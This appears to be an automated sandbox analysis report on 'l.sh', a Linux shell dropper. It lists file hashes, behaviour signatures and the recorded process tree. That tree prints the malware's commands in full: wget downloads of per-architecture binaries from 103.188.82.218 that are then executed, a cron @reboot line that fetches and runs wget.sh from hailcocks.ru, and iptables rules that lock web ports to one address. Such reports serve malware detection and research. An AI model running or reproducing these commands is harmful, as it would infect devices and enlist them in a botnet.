Analysis
-
max time kernel
149s -
max time network
140s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
-
submitted
28-12-2024 10:13
General
-
Target
l.sh
-
Size
1KB
-
MD5
f1bc5c9578ad5b69e09a58a6b3721b64
-
SHA1
b7ce08c279c3c9c846a9f8edb4214e7fc4a40d72
-
SHA256
c632725093e64d00e75fd6ac65faa0b27880419911c47b99319fae9a92e845f8
-
SHA512
5afccb744365dc43090fa8c18e965708c3e45f8239268a31e2453cc3c32ff7bab095fc1718d2f89d3c597770c973a000722b4cba95c78896b1e63a92dba93788
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 8 IoCs
-
Renames itself 1 IoCs
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/l.sh/tmp/l.sh1⤵
- Writes file to shm directory
- Writes file to tmp directory
-
/usr/bin/killallkillall -9 dvrLocker2⤵
- Reads runtime system information
-
-
/bin/catcat /proc/mounts2⤵
-
-
/bin/grepgrep tmpfs2⤵
-
-
/bin/grepgrep rw2⤵
-
-
/bin/grepgrep -v noexe2⤵
-
-
/usr/bin/cutcut -d " " -f 22⤵
-
-
/bin/rmrm -rf .a .f2⤵
-
-
/bin/rmrm -rf .a .f2⤵
-
-
/bin/rmrm -rf .a .f2⤵
-
-
/bin/cpcp /proc/self/exe .f2⤵
- Reads runtime system information
-
-
/bin/chmodchmod 777 .f2⤵
- File and Directory Permissions Modification
-
-
/bin/rmrm -rf upnp2⤵
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.arm2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
-
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
-
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
-
-
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm5 -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.arm52⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm6 -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.arm62⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm6 -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.arm62⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mips -O -2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mpsl -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.mpsl2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.188.82.218/t/ppc -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.ppc2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.188.82.218/t/x86 -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.x862⤵
- Executes dropped EXE
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 443 -s 95.214.53.205 -j ACCEPT2⤵
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 80 -s 95.214.53.205 -j ACCEPT2⤵
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 8081 -s 95.214.53.205 -j ACCEPT2⤵
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 8080 -s 95.214.53.205 -j ACCEPT2⤵
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 8888 -s 95.214.53.205 -j ACCEPT2⤵
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 443 -j DROP2⤵
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 80 -j DROP2⤵
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 8081 -j DROP2⤵
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 8080 -j DROP2⤵
-
-
/sbin/iptablesiptables -A INPUT -p tcp --dport 8888 -j DROP2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
82KB
MD5d89fb71971ef87948c4609f4176aa351
SHA1c1b55e8f203e493b7f159a54fcd790f041950f19
SHA256be74b028c309d3e0b4791727a3a0da8b3eb278c95860b55f9c42cc16dcb40fd4
SHA5127248344009497a33f134707b3ef610b8bf1022656303d6cd9aa28b50ab903d82da498c5ac110da828e513dc1ff42942721ddbc0d2744fd0e0f4a26a24f60dc10
-
Filesize
73KB
MD5f812a7b3a877f717eb6e54b843b41848
SHA121ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA2569a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
306B
MD5698802c4c3d1355d3c6306be9acb436d
SHA1666c2e7f887adff8afc9127050736af2500cbc03
SHA2563ff4bbe672b7263ca89cf79b7802eb1edca6a3210b63e0ce609cc0675d9b257d
SHA512188a29ed3a263fc88391c25b56ca6514d50dd17494b1a8aa2e5372ac75c57defce7cd0b8279b8547ed0977e5b2a42e954ab3dbec5e1412cc67714f0d38c69782